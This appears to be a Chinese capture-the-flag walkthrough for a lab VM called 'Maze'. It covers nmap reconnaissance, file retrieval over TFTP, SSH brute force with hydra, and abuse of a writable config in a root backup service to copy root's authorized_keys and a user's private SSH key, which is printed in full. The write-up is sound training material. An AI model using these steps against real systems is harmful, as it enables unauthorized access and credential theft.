Maze

靶机说明

QQ群：660930334
WP参考：https://7r1umphk.github.io/post/nei-bu-_Maze.html

一、信息收集

1、主机探测

┌──(root㉿kali)-[/tmp]
└─# nmap -sn 192.168.2.0/24                 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-08 15:08 CST
Nmap scan report for 192.168.2.1
Host is up (0.00056s latency).
MAC Address: 0A:00:27:00:00:09 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00044s latency).
MAC Address: 08:00:27:D9:5C:31 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.5
Host is up (0.00067s latency).
MAC Address: 08:00:27:BC:50:26 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.15 seconds

靶机IP：192.168.2.5

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[/tmp]
└─# nmap --min-rate 10000 -p- 192.168.2.5                      
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-08 15:09 CST
Nmap scan report for 192.168.2.5
Host is up (0.00063s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:BC:50:26 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 5.20 seconds

开放端口：22、80

2.详细信息扫描

┌──(root㉿kali)-[/tmp]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.5  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-08 15:10 CST
Nmap scan report for 192.168.2.5
Host is up (0.00076s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
| http-robots.txt: 13 disallowed entries 
| /.github/ /.phan/ /assets/ /backup/ /bin/ /cache/ /logs/ 
|_/system/ /tests/ /tmp/ /user/ /vendor/ /webserver-configs/
|_http-generator: GravCMS
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Home | Grav
MAC Address: 08:00:27:BC:50:26 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.84 seconds

22端口:ssh服务，版本为OpenSSH 8.4p1，用于远程登录
80端口:http服务，框架为GravCMS，存在robots.txt目录

3.UDP端口扫描

┌──(root㉿kali)-[/tmp]
└─# nmap -sU --top-ports 20 192.168.2.5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-08 15:12 CST
Nmap scan report for 192.168.2.5
Host is up (0.00084s latency).

PORT      STATE         SERVICE
...
68/udp    open|filtered dhcpc
69/udp    open|filtered tftp
...
MAC Address: 08:00:27:BC:50:26 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 22.96 seconds

开放端口：68、69

https://book.hacktricks.wiki/zh/network-services-pentesting/69-udp-tftp.html

4.漏洞脚本扫描

┌──(root㉿kali)-[~]
└─# nmap --script=vuln -p22,80 192.168.2.5             
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-08 15:13 CST
Nmap scan report for 192.168.2.5
Host is up (0.00082s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.2.5:80/system/assets/jquery/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/jquery/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/jquery/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/jquery/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/jquery/?C=D%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/jquery/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/jquery/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/jquery/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/jquery/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/jquery/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/jquery/?C=S%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/jquery/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/jquery/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/jquery/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/jquery/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/jquery/?C=M%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/jquery/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/jquery/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/jquery/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/jquery/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/responsive-overlays/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/responsive-overlays/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/responsive-overlays/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/responsive-overlays/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/?C=D%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/?C=S%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/debugger/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/debugger/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/debugger/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/debugger/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/?C=M%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/jquery/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/jquery/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.2.5:80/system/assets/jquery/?C=S%3BO%3DA%27%20OR%20sqlspider
|_    http://192.168.2.5:80/system/assets/jquery/?C=M%3BO%3DA%27%20OR%20sqlspider
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-fileupload-exploiter: 
|   
|     Couldn't find a file-type field.
|   
|_    Couldn't find a file-type field.
| http-internal-ip-disclosure: 
|_  Internal IP Leaked: 127.0.1.1
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum: 
|   /backup/: Backup folder w/ directory listing
|   /logs/: Logs
|   /robots.txt: Robots file
|   /bin/: Potentially interesting directory w/ listing on 'apache/2.4.62 (debian)'
|   /cache/: Potentially interesting directory w/ listing on 'apache/2.4.62 (debian)'
|   /images/: Potentially interesting directory w/ listing on 'apache/2.4.62 (debian)'
|   /system/: Potentially interesting directory w/ listing on 'apache/2.4.62 (debian)'
|   /tmp/: Potentially interesting directory w/ listing on 'apache/2.4.62 (debian)'
|   /user/: Potentially interesting directory w/ listing on 'apache/2.4.62 (debian)'
|_  /vendor/: Potentially interesting directory w/ listing on 'apache/2.4.62 (debian)'
MAC Address: 08:00:27:EF:3E:9E (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 45.92 seconds

找到可能存在sql注入以及一些目录

二、渗透测试

1、WEB渗透

访问80端口，发现是靶场的介绍页面，经过查看发现cms是Grav 1.7.48，查看发现该版本存在RCE漏洞，但是需要登录权限，而admin登录页面访问发现不存在，因此该攻击路径不可行。

2、TFTP渗透

直接连接该服务

1
2
3

┌──(root㉿kali)-[/tmp]
└─# tftp 192.168.2.5        
tftp>

成功连接，但是TFTP 不提供目录列表

尝试枚举常见的文件名

┌──(root㉿kali)-[/tmp]
└─# tftp 192.168.2.5
tftp> get id
Error code 1: File not found
tftp> get user
Error code 1: File not found
tftp> get user.txt
tftp>

成功获取到user.txt文件

┌──(root㉿kali)-[/tmp]
└─# cat user.txt     
flag{user-4e79af9d9b43464228ae1100839a2575}
username:bamuwe
need:bruteforce

提示需要暴力破解

三、SSH暴力破解

使用hydra对用户bamuwe进行暴力破解

┌──(root㉿kali)-[/tmp]
└─# hydra -t 64 -l bamuwe -P /usr/share/wordlists/rockyou.txt ssh://192.168.2.5 -F -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-09-08 15:22:29
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ssh://192.168.2.5:22/
[22][ssh] host: 192.168.2.5   login: bamuwe   password: hahaha
[STATUS] attack finished for 192.168.2.5 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-09-08 15:23:23

找到密码：hahaha

进行连接，获取shell

┌──(root㉿kali)-[/tmp]
└─# ssh bamuwe@192.168.2.5                       
bamuwe@Maze:~$ id
uid=1005(bamuwe) gid=1005(bamuwe) groups=1005(bamuwe)

四、权限提升

在/opt目录下发现关键服务脚本

bamuwe@Maze:/opt$ ls -la
total 12
drwxr-xr-x  2 root root 4096 Aug 15 08:07 .
drwxr-xr-x 18 root root 4096 Mar 18 20:37 ..
-rw-r--r--  1 root root 2524 Aug 15 08:07 log_backup_service.py

bamuwe@Maze:/opt$ cat log_backup_service.py 
#!/usr/bin/env python3

import os
import json
import time
import shutil
import logging
from datetime import datetime

logging.basicConfig(
    filename='/var/log/log_backup_service.log',
    level=logging.INFO,
    format='%(asctime)s - %(levelname)s - %(message)s'
)

CONFIG_PATH = '/etc/log_backup_service/config.json'

def create_directory_as_root(path):
    if not os.path.exists(path):
        logging.info(f"Directory {path} does not exist, creating it now.")
        try:
            os.makedirs(path)
            logging.info(f"Successfully created directory: {path}")
            return True
        except Exception as e:
            logging.error(f"Failed to create directory {path}: {e}")
            return False
    return True

def backup_logs(config):
    source_log = config.get("source_log_path")
    backup_dest = config.get("backup_dest")

    if not source_log or not backup_dest:
        logging.error("Configuration is missing 'source_log_path' or 'backup_dest'.")
        return

    if not create_directory_as_root(backup_dest):
        logging.error("Failed to create backup destination directory. Aborting.")
        return

    run_as_user = config.get("run_as_user", "nobody")
    try:
        logging.info(f"Attempting to switch user to {run_as_user}...")
        os.chown(backup_dest, os.getuid(), os.getgid())
        logging.info("User switch simulated. Performing backup.")
    except Exception as e:
        logging.warning(f"Failed to switch user to {run_as_user}: {e}. Continuing as current user (root).")

    try:
        timestamp = datetime.now().strftime("%Y%m%d%H%M%S")
        backup_filename = os.path.basename(source_log)
        archive_path = os.path.join(backup_dest, f"{backup_filename}.{timestamp}.bak")

        shutil.copyfile(source_log, archive_path)
        logging.info(f"Backup successful: {source_log} -> {archive_path}")
    except Exception as e:
        logging.error(f"Backup failed: {e}")

def main():
    while True:
        try:
            with open(CONFIG_PATH, 'r') as f:
                config = json.load(f)
            backup_logs(config)
        except FileNotFoundError:
            logging.error(f"Configuration file not found at {CONFIG_PATH}. Skipping backup.")
        except json.JSONDecodeError:
            logging.error(f"Failed to parse JSON from {CONFIG_PATH}. Check file format.")
        except Exception as e:
            logging.error(f"An unexpected error occurred: {e}")

        time.sleep(60)

if __name__ == "__main__":
    main()

这是一个以root权限运行的日志备份守护进程，主要功能包括：

定期备份指定路径的日志文件
支持配置文件管理，路径：/etc/log_backup_service/config.json
自动创建备份目录
记录操作日志
模拟用户权限切换

查看配置文件权限

1 2	`bamuwe@Maze:/opt$ ls -al /etc/log_backup_service/config.json -rwxrwxrwx 1 root root 113 Aug 15 08:08 /etc/log_backup_service/config.json`

发现具有写入权限

1、读取root的公钥

修改配置文件里面的路径，将root下面的公钥自动备份到/tmp目录下

{
  "source_log_path": "/root/.ssh/authorized_keys",
  "backup_dest": "/tmp",
  "run_as_user": "root"
}

成功获取到root的公钥

1
2

bamuwe@Maze:/tmp$ cat authorized_keys.20250908033621.bak 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDnxsglQGkTg9RmRrpKDmp3NIRcLhx98uHQJSjhJo7OqXsXbQAJtx5BMfcHGemYBiSPCIt+6Ktqabuor84EI1R+bgTKrLgOnEsfQiXlW3kHu533YDNGU/H2Kk1ADi3w0m/bjjlF+vOqUTY11Z3eadIA/yGdOlEwSfu6xUh1RxqjQmBIcIY5fwIW8HO74l3wnl824RirQyjf5LR1ZhHxXg0jAOA/2XZ/vWGwregQGhhVzqQv1ofgjqVRshJPkEJu1pfDFIopJsYIVzSrzsmwiznPOXIvPmQLzdoVFRhmQsI14L4TZNLdAqe7GxBussP/yAPi/Boj2jpHUfb0Skh9kvtpJwTjN4zko9AhSKhuwJlEQyos0Hn9Cvny3/H+nPvVLOGhlQG/gxhZQ34d7Efm5Qm3eD96Tu1qKu3vUU/yZxjMWFpFW/r0gl0QB1MY5AN8ZYCIijGPOMw5F4B9rv0Hp1anMA2WOisxjeESCPfAWqjWHtgmOKOSCf9hw7WmXtH4BG8= ll104567@Maze

发现私钥存在于ll104567，rsa加密

2、读取root的私钥

{
  "source_log_path": "/home/ll104567/.ssh/id_rsa",
  "backup_dest": "/tmp",
  "run_as_user": "root"
}

成功读取到私钥

bamuwe@Maze:/tmp$ cat id_rsa.20250908033921.bak 
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

3、获取root的shell

根据获取到的私钥，成功进行连接

bamuwe@Maze:/tmp$ cat id_rsa.20250908033921.bak  > id
bamuwe@Maze:/tmp$ chmod 600 id
bamuwe@Maze:/tmp$ ssh root@localhost -i id
...
root@Maze:~# id
uid=0(root) gid=0(root) groups=0(root)

五、获取FLAG

root@Maze:~# find / -name user.txt
/srv/tftp/user.txt
root@Maze:~# cat /srv/tftp/user.txt 
flag{user-4e79af9d9b43464228ae1100839a2575}
username:bamuwe
need:bruteforce
root@Maze:~# cat /root/root.txt
flag{root-6195bd8a9d755a41e493440a804f46d4}

Maze-sec

#cms-grav #ssh爆破

Maze

http://miao-sec.github.io/Maze-sec/Maze/

作者

Miao

发布于

2026年1月9日

许可协议

BY-MIAO

Mount 上一篇